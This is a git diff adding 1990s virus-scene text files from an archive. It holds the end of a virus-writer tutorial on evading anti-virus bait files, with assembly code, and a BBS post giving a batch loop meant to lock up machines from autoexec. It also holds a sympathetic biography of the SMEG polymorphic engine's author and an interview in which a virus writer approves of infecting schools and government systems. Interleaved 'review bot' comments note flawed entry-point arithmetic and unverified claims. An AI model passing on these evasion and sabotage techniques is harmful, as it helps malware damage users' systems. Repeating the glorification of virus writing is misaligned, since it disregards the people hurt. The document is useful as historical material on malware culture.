+ + Also check for huge amounts of 00h bytes after jumps. + + + - Check if the first instructions are a + mov ah, 4Ch + int 21h sequence (same for ret) + or if the first instruction jumps to such a routine. + + + - Check for zero jumps (E90000h, EB00h etc.); again, in "normal" programs, + usually there are no zero jumps. + + + - Check for jumps to jumps. Of course this can happen in any COM file, but + if you have a jump to a jump along with tons of NOP's, you can be sure + there are wierd things going on. + + + - Also check for calls to a ret, as this is meaningless code too. + + + As I said, on their own, none of these criteria are useful. But combined + they give kinda a bait-heuristic, and it depends on you, how you + consider the matches. A file that matches even 3 of these criteria is + suspicious in my eyes. + + + + + 2 - EXE Baits + + + + As for EXE baits, the above is still true. In addition to all that, we + have the EXE-header that can help us. + + - Most bait files don't have a stack! + To check this out, just compare CS with SS and SP with IP. If they both + match there is no stack, which is quite uncommon for EXE's. + + + + EXE header structure + + + + Offset Description Size + 00 Signature 1 word 'MZ' or 'ZM' + 02 Last Page Size 1 word + 04 File Pages 1 word + 06 Items 1 word + *08 Header Paras 1 word + 0A MinAlloc 1 word + 0C MaxAlloc 1 word + 0E SS 1 word< Compare CS + 10 SP 1 word< to SS and + 12 Negative checksum 1 word IP to SP! + *14 IP 1 word< + *16 CS 1 word< + 18 Reloc table offset 1 word + + ( [*] These are needed to calculate the entry point of the EXE. ) + + + An EXE file with no stack is definitely to be distrusted! + + + + + For the further code-analysis, you gotta analyse the code at the + entry point, and _NOT_ the code after the header! This is a bit more + complicated than for the COM's, but once you got the entry point + (file offset of the code at CS/IP), it's the same as for COM files. 
+ Unfortunately you won't find the entry point anywhere in the header. + To get it, you must use the following formula: + + + ((CS + Header Para's) * 16) + IP + + (See EXE header structure above) + + + Example: + mov ax, word ptr cs:[exeheader + 16h] ; This loads the CS + ; to AX + add ax, word ptr cs:[exeheader + 08h] ; Add the header + ; para's to CS + mov dx, 10h + mul dx ; Multiply by 16 + add ax, word ptr cs:[exeheader + 14h] ; Add the IP + + + This leaves the entry point in AX. Now all you need to do is to set the + filepointer to the calculated address, and there you go... + + + Final words: + + + By respecting the ideas mentioned in 'Resist!', and adopting some of these + techniques, you can be pretty sure to give the AV a hard time, unless you + want your latest virus in any AV software 2 days after it was released! :) + + + + + + diff --git a/textfiles.com/virus/batvirus.txt b/textfiles.com/virus/batvirus.txt new file mode 100644 index 00000000..8c9d52d9 --- /dev/null +++ b/textfiles.com/virus/batvirus.txt @@ -0,0 +1,22 @@ +Date: 9:47 pm Thu Nov 4, 1993 Number : 18 of 33 +From: XXXXXXXXXXXXXXX Base : Virus Discussion +To : XXXXXXXXXXXXXXX Refer #: 11 +Subj: Re: Pas Viruii Replies: None +Stat: Normal Origin : Local + +XX> creating batch file virii. If you're not all to hot in programming, batch +XX> files can be loads of fun. :) + +good call. the most simple batch i can think of is umm two batch files: + +@echo off + +:t1 + t2 + +:t2 + t1 + + +put t1 in the autoexec and it locks up each time. unless you load from a:drive +which is another reason im trying to fuck up the cmos on a puter. diff --git a/textfiles.com/virus/bbinterv.iew b/textfiles.com/virus/bbinterv.iew new file mode 100644 index 00000000..cfbb6776 --- /dev/null +++ b/textfiles.com/virus/bbinterv.iew 
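Review bot: the entry-point arithmetic drops half of its result: `mul dx` with DX=10h leaves a 32-bit product in DX:AX, but the listing then does `add ax, word ptr cs:[exeheader + 14h]` and the text says 'This leaves the entry point in AX', so any EXE whose code starts more than 64K into the file (CS + header paragraphs >= 1000h) gets a wrapped offset with no carry check; the DX half and the carry out of the final ADD both have to be kept. The header table is correct, but the prose says 'compare CS with SS and SP with IP' while the table's arrows say 'Compare CS to SS and IP to SP'; it is the same test, and one wording should be used in both places. On the heuristics themselves, the text says 'none of these criteria are useful' alone and that 'even 3 of these criteria' is suspicious, but never says how a match is scored or whether a NOP run counts once or per instruction, so the 'bait-heuristic' is not reproducible from this description. From the AV side the same list reads as a specification for what a goat file should not look like: a distinct stack segment, no NOP or zero padding after the entry jump, and a body that does more than print and exit.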
@@ -0,0 +1,393 @@ + + ANATOMY OF A VIRUS AUTHOR + + + A biography of The Black Baron + + + By + + + Matthew Probert + + + + +In 1969 Neil Armstrong stepped onto the moon. It was a momentous year for the +world. But no-one at the time paid much attention to a baby boy being born in +a town in southern England. This baby boy was destined to grow into one of the +most infamous computer virus writers of all time. In 1969 The Black Baron was +born! + +The Black Baron never set out to become a computer virus writer. He left +school at sixteen with a handful of CSE's and a burning desire to be a +commercial airline pilot. He enjoyed swimming and science fiction comedy +shows, such as Red Dwarf, and did all the things that any normal, healthy +young man would do. He learnt to drive, passed his driving test and settled +down to several years unemployed. + +He is at pains to point out that he is not a thug, he does not have any +criminal convictions; + +"I don't even have a point on my driving licence" he laughs, when asked about +criminal activities. + +And yet what inspires a normal, healthy, well balanced young man to create the +ultimate in computer terrosism, a polymorphic computer virus? + +In examining Black Baron's motives one must consider his state of mind. Is he +a shy, withdrawn individual who has problems with inter-personal relationships +perhaps? No is the answer. He is not the cliche of a computer programmer. He +owns a single second-hand Tandon 286 PC with an Amstrad monitor, and a rather +old and modest modem. + +"I don't even like computer programming!" he says when asked about it. + +Perhaps however he is upset by his unemployment? An individual with his +obvious and undeniable talent must surely feel some resentment at being +unemployed. 
But he doesn't blame the computer industry directly, he certainly +does resent the "old school tie" attitude which is so prevalent in England +today, and he blames the Conservative government for doing much to reinforce +this approach to employment. + +"I don't wear the right colour tie" he says. + +The inspiration to create a computer virus came to Black Baron after he read +Ross M. Greenberg's comments about computer virus authors. Mr Greenberg, the +American author of an anti-virus product called "Flu Shot" is very scathing +and critical of people who write computer viruses. Indeed the introduction to +the instruction manual which accompanies Flu Shot is preoccupied with +questioning the emotional stability of the people who write computer viruses. +I quote: + + Introduction + + What is a Trojan? + ================= + + Back in the good old days (before there were computers), there + was this bunch of soldiers who had no chance of beating a + superior force or of even making it into their fortress. They + had this nifty idea: present the other side with a gift. Once + the gift had been accepted, soldiers hiding within the gift would + sneak out and overtake the enemy from within. + + We can only think of the intellectual giants of the day who would + accept a gift large enough to house enemy soldiers without + checking its contents. Obviously, they had little opportunity to + watch old WWII movies to see the same device used over and over + again. They probably wouldn't have appreciated Hogan's Heroes + anyway. No color TV's -- or at least not ones with reliable + reception. + + Consider the types of people who would be thrilled at the concept + of owning their own rough hewn, large wooden horse! Perhaps they + wanted to be the first one on their block, or something silly + like that. + + Anyway, you're all aware of the story of The Trojan Horse. 
+ + Bringing ourselves a bit closer to the reality we've all grown to + know and love, there's a modern day equivalent: getting a gift + from your BBS or user group which contains a little gem which + will attack your hard disk, destroying whatever data it contains. + + In order to understand how a potentially useful program can cause + such damage when corrupted by some misguided soul, it's useful to + understand how your disk works, and how absurdly easy it is to + cause damage to the data contained thereon. So, a brief + technical discussion of the operation of your disk is in order. + For those who aren't concerned, turn the page or something. + + Data is preserved on a disk in a variety of different physical + ways having to do with how the data is encoding in the actual + recording of that data. The actual *structure* of that data, + however, is the same between MS-DOS machines. Other operating + systems have a different structure, but that doesn't concern us + now. + + Each disk has a number of "tracks". These are sometimes called + cylinders from the old type IBMer's. These are the same people + who call hard disks DASDs (Direct Access Storage Devices), so we + can safely ignore their techno-speak, and just call them tracks. + Tracks can be thought of as the individual little grooves on an + audio record, sort of. + + Anyway, each track is subdivided into a number of sectors. Each + track has the same number of sectors. Tracks are numbered, as + + are sectors. Any given area on the disk can be accessed if a + request is made to read or write data into or out of Track-X, + Sector Y. The read or write command is given to the disk + controller, which is an interface between the computer itself and + the hard disk. The controller figures out what commands to send + to the hard disk, the hard disk responds and the data is read or + written as directed. 
+ + The first track on the hard disk typically will contain a small + program which is read from the hard disk and executed when you + first power up your machine. The power up sequence is called + "booting" your machine, and therefore the first track is typical + known as the "boot track". + + In order to read information from your disk in a logical + sequence, there has to be some sort of index. An unusual index + method was selected for MS-DOS. Imagine going to the card index + in a library, looking up the title you desire, and getting a + place in another index which tells you where on the racks where + the book is stored. Now, when you read the book, you discover + that only the first chapter of the book is there. In order to + find the next chapter of the book, you have to go back to that + middle index, which tells you where the next chapter is stored. + This process continues until you get to the end of the book. + Sounds pretty convoluted, right? You bet! However, this is + pretty much how MS-DOS does its "cataloguing" of files. + + The directory structure of MS-DOS allows for you to look up an + item called the "first cluster". A cluster represents a set of + contiguous ("touching or in contact" according to Random House) + tracks and sectors. It is the smallest amount of information + which the file structure of MS-DOS knows how to read or write. + + Based on the first cluster number as stored in the directory, the + first portion of a file can be read. When the information + contained therein is exhausted, MS-DOS goes to that secondary + index for a pointer to the next cluster. That index is called + the File Allocation Table, commonly abbreviated to "FAT". The + FAT contains an entry for each cluster on the disk. 
An FAT entry + can have a few values: ones which indicate that the cluster is + unused, another which indicates that the associated cluster has + been damaged somehow and that it should be marked as a "bad + cluster", and a pointer to the next cluster for a given file. + This allows for what is called a linked list: once you start + looking up clusters associated with a given file, each FAT entry + tells you what the next cluster is. At the end of the linked + list is a special indicator which indicates that there are no + more clusters associated with the file. + + There are actually two copies of the FAT stored on your disk, but + no one really knows what the second copy was intended for. + Often, if the first copy of the FAT is corrupted for some reason, + a clever programmer could recover information from the second + copy to restore to the primary FAT. These clever programmers can + be called "hackers", and should not be confused with the thieves + + who break into computer systems and steal things, or the "worms" + [Joanne Dow gets credit for *that* phrase!] who would get joy out + of causing you heartache! + + But that heartache is exactly what can happen if the directory + (which contains the pointer to the first cluster a file uses), + the FAT (which contains that linked list to other areas on the + disk which the file uses), or other areas of the disk get + corrupted. + + And that's what the little worms who create Trojan programs do: + they cause what at first appears to be a useful program to + eventually corrupt the important parts of your disk. This can be + as simple as changing a few bytes of data, or can include wiping + entire tracks clean. + + Not all programs which write to your hard disk are bad ones, + obviously. Your word processor, spreadsheet, database and + utility programs have to write to the hard disk. 
Some of the DOS + programs (such as FORMAT), if used improperly, can also erase + portions of your hard disk causing you massive amounts of grief. + You'd be surprised what damage the simple "DEL" command can do + with just a simple typo. + + But, what defines a Trojan program is its delivery mechanism: the + fact that you're running something you didn't expect. Typical + Trojan programs cause damage to your data, and were designed to + do so by the worms who writhe in delight at causing this damage. + May they rot in hell -- a mind is a terrible thing to waste! + + Considering the personality required to cause such damage, you + can rest assured that they have few friends, and even their + mother doesn't like to be in the same room with them. They sit + back and chortle about the damage they do with a few other lowly + worms. This is their entire social universe. You should pity + them. I know that I do. + + What is a Virus? + ================ + + Trojan programs are but a delivery mechanism, as stated above. + They can be implemented in a clever manner, so that they only + trigger the malicious part on a certain date, when your disk + contains certain information or whatever. However they're coded, + though, they typically affect the disk only in a destructive + manner once triggered. + + A new breed of programs has the capability of not only reserving + malicious damage for a given event's occurrence, but of also + replicating itself as well. + + This is what people refer to when they mention the term "Virus + Program". + + Typically, a virus will spread itself by replicating a portion of + itself onto another program. Later, when that normally safe + program is run it will, in part, execute a set of instructions + which will infect other programs and then potentially, trigger + the Trojan portion of the program contained within the virus. + + The danger of the virus program is twofold. First, it contains a + Trojan which will cause damage to your hard disk. 
The second + danger is the reason why everyone is busy building bomb shelters. + This danger is that the virus program will infect other programs + and they in turn will infect other programs and so forth. Since + it can also infect programs on your floppy disks, you could + unknowingly infect other machines! Pretty dangerous stuff, + alright! + + Kenneth van Wyck, one of the computer folks over at Lehigh + University, first brought a particular virus to the attention of + the computer community. This virus infects a program, which + every MS-DOS computer must have, called COMMAND.COM. This is the + Command Line Interpreter and is the interface between your + keyboard and the MS-DOS operating system itself. Whatever you + type at the C: prompt will be interpreted by it. + + Well, the virus subverts this intended function, causing the + infection of neighboring COMMAND.COMs before continuing with + normal functionality of the command you typed. After a certain + number of "infections", the Trojan aspect of the program goes + off, causing you to lose data. + + The programmer was clever. But still a worm. And still + deserving of contempt instead of respect. Think of what good + purposes the programmer could have put his or her talents to + instead of creating this damage. And consider what this + programmer must do, in covering up what they've done. They + certainly can't tell anyone what they've accomplished. + Justifiable homicide comes to mind, but since the worms they must + + hang around are probably as disreputable as they are, they must + hold their little creation a secret. + + A pity. Hopefully, the worm is losing sleep. Or getting a sore + neck looking behind them wondering which of their "friends" are + gonna turn them in for the reward I list towards the end of this + document. 
+ + The Challenge to the Worm + ========================= + + When I first released a program to try to thwart their demented + little efforts, I published this letter in the archive (still in + the FLU_SHOT+ archive of which this is a part of). What I say in + it still holds: + + As for the designer of the virus program: most + likely an impotent adolescent, incapable of + normal social relationships, and attempting to + prove their own worth to themselves through + these type of terrorist attacks. + + Never succeeding in that task (or in any + other), since they have no worth, they will one + day take a look at themselves and what they've + done in their past, and kill themselves in + disgust. This is a Good Thing, since it saves + the taxpayers' money which normally would be + wasted on therapy and treatment of this + miscreant. + + If they *really* want a challenge, they'll try + to destroy *my* hard disk on my BBS, instead of + the disk of some innocent person. I challenge + them to upload a virus or other Trojan horse to + my BBS that I can't disarm. It is doubtful the + challenge will be taken: the profile of such a + person prohibits them from attacking those who + can fight back. Alas, having a go with this + lowlife would be amusing for the five minutes + it takes to disarm whatever they invent. + + Go ahead, you good-for-nothing little + slimebucket: make *my* day! + + + Alas, somebody out there opted to do the cowardly thing and to + use the FLUSHOT programs as a vehicle for wrecking still more + destruction on people like you. The FLUSHOT3 program was + redistributed along with a companion program to aid you in + reading the documentation. It was renamed FLUSHOT4. And the + reader program was turned into a Trojan itself. + + I guess the programmer involved was too cowardly to take me up on + my offer and prefers to hurt people not capable of fighting back. 
+ I should have known that, I suppose, but I don't normally think + of people who attack innocents. Normally, I think of people to + respect, not people to pity, certainly not people who must cause + such damage in order to "get off". + + They are below contempt, obviously, and can do little to help + themselves out of the mire they live in. + + Still, a worm is a worm. + + +Insensed by what he saw as the narrow, biggoted attitude of the author, our +young man, then twenty four years old, decided to write a program which would +infect other other computer programs and more than that. One which would with +each infection change its form so as to avoid detection by Flu Shot and other +virus scanners. At christmas 1993, Pathogen was completed. One month later +SMEG 0.1 was included and the first SMEG virus hit the computer world. + +In Febuary 1994 Black Baron, as the author was calling himself, released a +subsequent computer virus. Queeg. This time he updated the polymorphic engine +(SMEG) into version 0.2. + +Shortly aftwerwards the Thunderbyte anti-virus software underwent a major new +release, with verion 6.20 which in fairness detects 96% of SMEG version 0.1 +and version 0.2 infections. Unfortunately, the author's of Thunderbyte suffer +from the same arrogance as Mr Greenberg. They have widely boasted that their +new virus scanner can detect any polymorphic viruses. Needless to say this is +seen as a challenge by Black Baron. And being an Englishman, he can't resist a +challenge. It is not surprising to learn then, that as I write this in June +1994 Black Baron is just finishing off SMEG version 0.3 which is completely +undetectable by any current virus scanner, including Thunderbyte release 6.20. + +I ask myself when is this is all going to end? Perhaps when computer users +become sufficiently educated to be able to use the equipment at their +disposal. 
Perhaps when computers stop attracting social inadequates, but whom +I am refering to the arrogant members of the anti-virus lobby as well as the +nefarious virus authors. But what of the Black Baron? What is he? Is he a +malicious criminal? A computer terrorist? A social inadequate trying to +reassure himself of his own inadequacies through destroying computer data? I +don't belive so. I have spoken to Black Baron on a number of occassions. He is +happy to discuss his work, and, at my request, he has even released a document +detailing the design of SMEG. He doesn't feed on the panic and fear that SMEG +viruses such as Pathogen and Queeg cause. Rather he revels in the +embarrasement and panic which his software causes the arrogant anti-virus +writers. + +It is quite questionable whether Black Baron was sensible in taking this +course of action. It does appear that he has adopted a "I'll show you" +attitude. But it is equally obvious that the real villian is the person who +caused the trouble in the first place, Mr Greenberg and his arrogant and +biggoted view. You still don't believe me? Okay, as a finale let me say this. +Black Baron knows that I write anti-virus software. He knew this before he +gave me an interview. And knowing that I write anti-virus software he provided +me with the source code of Pathogen, Queeg and SMEG so that I might improve my +anti-virus software. He even supplied me with software which creats safe SMEG +encrypted programs for testing purposes. These are not the actions of a mad +man. These are the actions of a man who just wants to be respected for what he +is. A damn hot programmer. + +After talking with him, I understand the Black Baron. I feel sorry for him as +well. He is a highly gifted individual who has not been given a chance by +computer society. So he has made his own chance. We all need recognition. +Mainly through employment, but we as thinking machines must receive +recognition for our abilities. 
Otherwise we sink into melancholy and +paranoida. Black Baron has received his recognition. We, the computer society +are responsible for the creation of Pathogen, Queeg, SMEG and all the other +computer viruses. We have no one to blame but ourselves. It is our desire to +keep the computer fraternity a closed club which has alienated so many of our +colleagues. By rubbing their noses in it, so to speak, we have begged for +trouble, and like the inhabitants of Troy, we have received it. + +Matthew Probert +Servile Software diff --git a/textfiles.com/virus/bdinterv.iew b/textfiles.com/virus/bdinterv.iew new file mode 100644 index 00000000..0e86ecf5 --- /dev/null +++ b/textfiles.com/virus/bdinterv.iew 
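Review bot: the Flu Shot manual quoted in the middle of this file contradicts itself on the second FAT: it says 'no one really knows what the second copy was intended for' and in the next sentence describes recovering a corrupted primary FAT from it, which is exactly what the copy is for; keeping the quote as historical record is fine, but it should not be read as a technical reference (the same passage defines a cluster as contiguous 'tracks and sectors', whereas a cluster is a fixed run of sectors). The biography's own technical claims are given as fact with nothing the reader can check: that Thunderbyte 6.20 'detects 96% of SMEG version 0.1 and version 0.2 infections' describes no test, and that SMEG 0.3 'is completely undetectable by any current virus scanner' is a prediction about an unreleased engine as of the 'June 1994' dateline. The misspellings in the added text (terrosism, Insensed, biggoted, Febuary, aftwerwards, verion, creats, paranoida) are presumably preserved from the original file and should stay if the archive's policy is verbatim copies.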
@@ -0,0 +1,445 @@ +=====================[ BLONDE INTERVIEW ]======================================= + +This interview was done quite some time ago (When Blonde still was an +independant novice viruswriter), but since I want you to know the new +members of Immortal Riot, I decided to include it anyhow. + +The story why Blonde (then using another handle), became a member of +the virus community was bcos he got hit by a destructive virus I made +for IR#5 and wanted to know how to protect himself against those evil +programs :). He ended up being a member of the group which crashed his +harddrive. + +TU = The Unforgiven +BL = Blonde + +TU> Give me a short description of who you are? + (real name/ID-number/phone#/adress/age :)) + +BL> John Doe / 01-12-23/ 0123-456 78 / 54 Unknown St. / 18 + +TU> From where did you get you handle, Blonde? + +BL> From one of Quentin Tarantinos movies, Reservoir Dogs. One of the main + characters is called Mr. Blonde + +TU> Does your handle has some specific meaning? + +BL> The character Mr. Blonde is kind of cruel... guess I'm cruel too;) + +TU> When did you discovered the world of computers? + +BL> That was around the age of, erh..., 11 or 12 or something like it... + +TU> How long have you been active in the scene? + +BL> Depends on wich scene... I haven't been active in the virus scene for + more than a year, or maybe one and a half..something like it, I don't + count days... + +TU> Why did you start to call boards and such things? + +BL> Well first I was just astonished that I could use a modem to + comunicate with other persons then I got into the wareZ scene and + discovered that one could get hold of alot of intresting softw. but + that didn't last long... but it was still the main reason I started + calling boards. + (* side note... I don't know why but it seems like the warez scene is + where all ppl start out, but then move on to the scene that really fits + them. end side note *) + +TU> How did you come into the virus business? 
+ +BL> Well I guess I just wanted to learn more about viruses, mainly for + protective purposes. As some of you guys know I didn't bother about + viruses until I got hit by Bad Attitude... (* This is a very + funny story, indeed - TU *) then I started to look at virus-code and + though it woul be cool to be able to write one by myself and well after + a period of trial and error I succeeded and realised I'd found my niche. + +TU> Why did you start to write viruses? + +BL> Because they intrigued me... they attracted me and to some extent to + make something those warez-puppies feared like hell... + +TU> Which goals do you have as a viruswriter? + +BL> To make the perfect virus... would be nice ;) naah well I set my goals + in a closer future as for now I'm aiming to do a multipartite. It + might even be included in this mag.. who knows? + after that I'll probebly try to combine all my knowledge in a + multipartite with full stealth or something like it... + (* This has now been sorta done.. *) + +TU> What programming-languages are you familiar with, and whats your + favourite language? + +BL> I'm a descent pascal programmer. I was my first programming language + and I've done tons of apps in it. I'm also familiar with C and trying + to teach myself C/C++ at the moment... and asm ofcourse. + + Since I started using asm I've realised that it's far more powerful + atleast if it's not too _big_ apps. so nowadays I mainly use asm for + everything... + +TU> How many viruses have you written? + +BL> gee... I dunno... not so many I guess. I think I've _finished_ about 5 + or so.. they're easy to count though... one non-ow, one res com, one + enc res com, one res com/exe and then s4 + +TU> How do you name your viruses? + +BL> That depends... Something that has a meaning to me... or something + that sounds good... Salamander Four for example was nicked from a book + by Peter O'Donnel where S4 is the name of a crime-syndicate... + +TU> What motivates you to write viruses? 
+ +BL> The learning process... mainly and the kick when you've succeeded with + something you haven't done before. thats a thrill.. + +TU> Did some of them carried a destructive payload? + +BL> I've written destructive payloads, yes... but up to date I haven't + spread my viruses so I've never included any payloads at all + +TU> Do you think you will continue to write viruses? + +BL> Yes, until I get fed up with them, but that will hopefully take + time... + +TU> Whould you feel guilty if one of your viruses made damage to a + hospital, and someone got harmed bcos of that? + +BL> Probably... I don't know since it hasn't happened... but I think I + would... thats why I prefere non-destructive payloads... + +TU> Would you deliberate infect a school or government institution if you + know they would replicate well if you did so? + +BL> Yes.. schools and govermental institutions wouldn't be a problem at + all, because a virus can't do anyone physical harm through them... + +TU> Do you find it easier to infect pirated software (which is illegal to + use), than PD/SW software? + +BL> That doesn't bother me at all... software is software... I just add my + piece of code... it doesn't change the function of the program... BUT + if I infect pirate software that would probably be because I would like + my virus to spread... pd/sw doesn't travel as fast as pirated software + does... + +TU> Do you encourage deliberate destructive code in viruses? + +BL> It doesn't bother me as long as it isn't my HD you're nukin'... but I + prefer funny payloads... + +TU> Have you considered writing destructive code in viruses? + +BL> Oh yes. I've considered it... I'll probably end up including + destructive code in some viruses, just to get attention ;) + +TU> What to you think of the issue concerning 'undestructive-viruses'? + +BL> They're harmless as long as the remover (the person who removes them) + knows what to do and that may be a plus since most ppl. 
wouldn't get as + pissed off when struck by an undestructive virus... + +TU> Do you think one can make a virus benefictial? + +BL> Maybe... I've had that though really... I just tend to see viruses as + a piece of code... or artificial life ;) + +TU> Have you ever considered writing a GOOD virus? + +BL> I would be more than happy to write a good virus since it then might + be more appreciated for the programming skill it took to write it + and not rejected by the fact that the viruses are seen as evil... + +TU> Gonthev described in his 'write-up' "Is good Computer-Viruses still + a bad idea?". Do you think it's possible to write a GOOD virus, which + serves a useful task, and at the same time, solves all problems that + he described? + +BL> It might be possible to write a _good_ virus BUT I'm not sure I would + consider viruses good, since it is so easy to loose control over it... + say for example you use one to encrypt your HD. what would your friend + think if his hd got encrypted? + + It might be possible to write what you and I consider a good virus, + but there is always someone who'll disagree with you. + +TU> About virus-code-generators, what is your opinion about them, and + about people using them thinking they are hot-shot-3liT333? + +BL> I consider people using code-generators as the worst virus-writer + wannabes. I really think they should try to write their own code, + because it's not that hard really... it just takes practise. + + Though code-generators are good for some people (like me ;)). I + actually learned a great deal from G2 and my first virus actually + looked very much like a G2 generated virus, but I wouldn't want to + release that source ;) On the other hand. To create a generator is a + good way to prove oneself as a good virus writer, because it takes a + lot of skill to do so... + +TU> Do you write viruses to get recognition in the virus/AV community? 
+ +BL> To some extent yes, because I'm not going to get any recognition + from the users that get hit by my viruses ;) + + But the recognition isn't that important. whats important is the fact + that I succeeded in creating the virus, that is by itself really + enough for me... + +TU> What do you think about the media/AV describing viruswriters as + lonely individuals with no life? + +BL> Haha... thats probably the biggest lie of them all! I'm having a + hard time finding enough time to write viruses because I've got + a very busy social life. + +TU> Do you think the scene is associal or not? + +BL> Thats a hard question... It's quite hard to get into the community, + ie. finding a board, making friends and learning... but once you're + in it's the best scene around! + + It's easier if you've got access to internet and irc though... you + meet alot of real good coders on irc and they're all willing to help + you out... + +TU> How are you in real life? + +BL> Hehe.. I'm a party animal... I just love parties it's just too bad my + wallet doesn't... I guess I'm just another normal guy, but with intresest + in viruses. + +TU> How do you make your living? + +BL> I don't. I'm still studying. + (* Notice, now Blonde also works for the same company as our + sysop, The Wizard does. He earns a lot of money, but spends + it all on Camel's (ciggs) and booze. - TU *) + +TU> Have the scene/viruswriting influent you in real life? + +BL> My opinion on viruses has changed a great deal... I've lost most of + my respect for them ie. my fear... ;) but my knowledge in viruses has + made me the av'er of the school when it gets hit... it might be because + I always know which virus it is... usually mine ;). + +TU> What do your parents/close friends think about your viruswriting? + +BL> My parents don't know, but I doubt that they would care. It's my + choice, they can't stop me and they know it... they might disagree + but since they're very realistic they wouldn't try or anything... 
+ most of my friends aren't aware of the fact that I write viruses, + some of them do and I'm trying to get one of them to start + writing. (* Movitz :-), Monica's little darling, hahhahah! *) (NBL) <- Rb's secret comment ;> (don't tell ne1) + +TU> Why havn't you told your parents about your activity in the + virus arena? + +BL> If they asked I would tell them if I thought it would change my + relationship with them, but I generally don't go around telling people + that I'm writing viruses because of the bad reputation viruses have got. + People tend to look at virus writers with disgust and thats not what + I'm looking for so I don't tell them... + +TU> Are you only into viruswriting or other parts of the + computer-underground as well? + +BL> I'm at the moment deep into viruses, but hacking is also an option if + virus writing gets boring. Well you could also probably add pirating + to the list since I don't have the money too buy the software I need... + but if I did I would probably stop, because programmers deserve + the money. Although most programmers at Microsoft don't ! + +TU> What in the scene do you find okay to do, and what dont you do bcos + you find it morally wrong? + +BL> Board trashing is morally wrong... it might be a lame sysop but he + has spent hours and hours setting the board up so let him be... + +TU> What parts of the underground do you think needs improvements? + +BL> The information exchange... most people just poll nets they don't + share.. + +TU> Whats your opinion about polymorphic engines? + +BL> Okey to use for the author, but for anyone else it would be like a + using a code-generator... + +TU> Why do you think people won't use them? (other than the inventors?) + +BL> Because those who use code-generators are happy with that and often + not smart enough to use a polymorphic engine... + the real virus writers wouldn't want to use code they haven't created + by themself atleast not to that extent... 
+ +TU> What do you think about the new computer-laws propositions concerning + viruses? + +BL> ARGH! viruses shouldn't be illegal in ANY way... it's just a piece of + code or if you look at it in a different way some characters in a + file... well I'm not into laws... I don't think a community should have + any laws... I belive that everybody should use common sense to judge their + actions.. but that won't work in todays society... + +TU> Whats your opinion about the EU? + +BL> Well... too big... but as it looks Sweden would've had real big + problems if not being accepted... the EU-market is too large too miss + and swedish companies would've moved out of the country to get cheaper + labour and to get rid of all the taxes... aah well nothing is perfect, + is it? + +TU> Whats your opinion about the swedish government? + +BL> It sucks... the politicians are too weak and no one has the guts to do + anything about it... + +TU> Do you distribute your viruses to the public? + +BL> Haven't done that so far... + +TU> Which virus programmer do you admire/like? + +BL> I donno really... haven't had that much contact with _major_ virus + writers... but I like Qark's style, doing the flash bios infector, + because it has never been done before... Thats what I admire, + originality. + +TU> Describe the perfect virus: + +BL> Hard to do actually, one could say that it would be full stealth on + every aspect and infect floppy boot/mbr/com/exe/sys/ovl and so forth, but + tomorrow everything might change because of some new tool invented or + something... + +TU> Describe the perfect viruscoder: + +BL> Even harder... but the most important thing is time and a brain is + preferred... + +TU> Describe the AV-community in a few lines: + +BL> Since I haven't released any viruses to the public I haven't encountered + any _real_ AV'ers... but I've followed some discussions at anti-virus + meetings and most of the AV'ers are simply morons... 
and they like + flaming so I guess I don't like 'em. + +TU> Which AV-program do you think is the best? + +BL> Tbav is probably the best if you know viruses, but Fprot is a close + second... For people not knowing so much about viruses I recommend + Mc Affee's scan since it doesn't give you any false alarms... + +TU> Do you think an AV-program can guarantee 100% detection rate + for all known & unknown viruses? + +BL> No, not without hardware protection. If it's software there will + always be way around it or a backdoor or a bug wich one could use to + by-pass it... + +TU> Bontchev wrote an article called "Future trends in viruswriting", to + you think viruses described will be coded in the future? + + (Lan aware viruses, snatching passwords, etc.) + +BL> Believe me, there are already viruses like that around! + +TU> (Anti-virus-virus - (retrovirus)) + +BL> If you mean that virus writers will attack other viruses, then I guess + I think that won't be so likely... maybe co-existing but not nukeing + others... + + (* Stupid goof, retro-viruses do attack AV-software - TU :) *) + + (maybe if you had wrote it "Anti-Anti_virus-virus" he would of got + it right ;) , looks like you both made a mistake ;)) (yep, you guessed + right: another obnoxious remark from rb :)) + +TU> (self-mutating viruses) + +BL> This is probebly very likely to be a project for someone, but it would + be DAMN hard to do... if not entirely impossible... probably impossible + actually. + +TU> (Hardware level stealth - like Strange) + +BL> mmm I don't know shit about Strange... but I guess writers all over + will try to find better ways of stealthing, so thats more than likely + to produce more complicated stealth-methods. + +TU> What to you think about the future for PC-DOS viruses? + +BL> The dos-virus probably still has a future because it'll be hard to + kill the dos environment... some people say that dos will die with + win95. 
I don't belive in that, maybe because I'll never change to a + GUI (* Grafical User Interface - TU *) but because win95 has enormous + hardware requirements that many pc-users won't match so atleast + they'll stay a while in a plain dos environment... + +TU> Do you think viruses will be written for other (newer) operating- + systems like OS/2 and Win95? + +BL> Yes probably... but not in pure-asm, as I see it it'll be the era of + high-level viruses... I also think it'll be another generation of virus + writers because most of todays writers are pure-asm coders and they + won't like the thought of writing viruses in C or Pascal or something + like it... + +TU> Have you ever considered writing a virus for another OS than DOS? + +BL> Considered, yes... tried, no... my knowledge of other OS's are far to + basic... and I don't even feel like it would be worth a try.. dos is + still the main pc-environment + +TU> Any advice to people who want's to learn the basic of virus-writing? + +BL> Yeah... get hold of some sources... ;) naah honestly sources are good, + but it's even better to get hold of a virus programmer and have him + explain a source. That usually helps ALOT... I'll help everyone I + can... and I know most writers feel the same... as long as it isn't + REALLY stupid questions... also looking at some tutes is useful. DA's + (* Dark Angel/Phalcon/Skism - TU *) guides help me out a lot... maybe + not the code, but the concept. + +TU> Do you think the virus-problem will slow down bcos of laws? + +BL> NO, probably just the opposite atleast it would work like that for + me... I know I can keep my real name hidden if I wanted to and I + disagree with laws like that so it would make me very productive and + also very destructive... + +TU> Can you be reached somewhere? + +BL> I can always be reached at TWL/HNS (+46-8-7354760). I'm working on a + real internet account..... + +TU> Your mottoe is: + +BL> nada... seize the day is a good one, but that is taken by someone.. 
;) + (* Who?? Horatius? :) *) + +TU> Something else you wish to say but never before had to opportunity + to say? + +BL> Hi mom...;) and well mmm erh... + +TU> Do you wish to send any greet/hate messages? + +BL> yup... a big thank you to Anders Gavare, Swedens numero uno + av-wanna-be and also the guy that keeps me writing viruses ;) + Without his attitude I wouldn't be alive since a laughter extends your + life... (^Swedish expression.. ;)) + + else mmm well thanks to all the people on IRC that has helped me out + or tried to help me out... especially darkman/vlad for a helping me + with a fprot alarm. + diff --git a/textfiles.com/virus/bedtime.nfo b/textfiles.com/virus/bedtime.nfo new file mode 100644 index 00000000..82b47317 --- /dev/null +++ b/textfiles.com/virus/bedtime.nfo 
